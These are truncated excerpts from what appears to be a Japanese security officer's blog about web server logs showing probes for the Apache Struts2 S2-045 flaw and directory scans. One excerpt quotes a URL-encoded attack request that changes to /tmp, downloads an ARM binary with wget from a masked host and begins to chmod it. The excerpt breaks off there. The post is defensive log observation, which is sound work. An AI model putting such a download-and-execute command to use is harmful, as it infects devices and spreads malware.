Struts2攻撃と思われるものに交じって、こんなのが来てました。 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%…

本日朝も以下のような探索ログが残っていました。 始めから終わりまで10秒間かけて順番に該当するものがあるか試してるみたいです。 Strutsってデフォルトこういうディレクトリ構成なの？？？（私は知見がないためわからないです） ちなみに発信元はドイツで…

3/23以降、今話題のApache Struts2の脆弱性（S2-045）を狙っているのかもしれないアクセスが急に来ていました。 Struts2を利用していると「.aciton」がURLに付くというのをWeb上で見ましたので、上記は今回の脆弱性を狙う攻撃につながるアクセスなのかなぁと…

某企業のセキュリティ担当者です。 日々社内や関連会社から相談受けたり、会社のルール作ったり、ウィルス感染が見つかれば端末没収（？）する仕事をしております。 とは言っても、まだまだ分からないことがたくさんあり、仕事に追われながら少しでも理解し…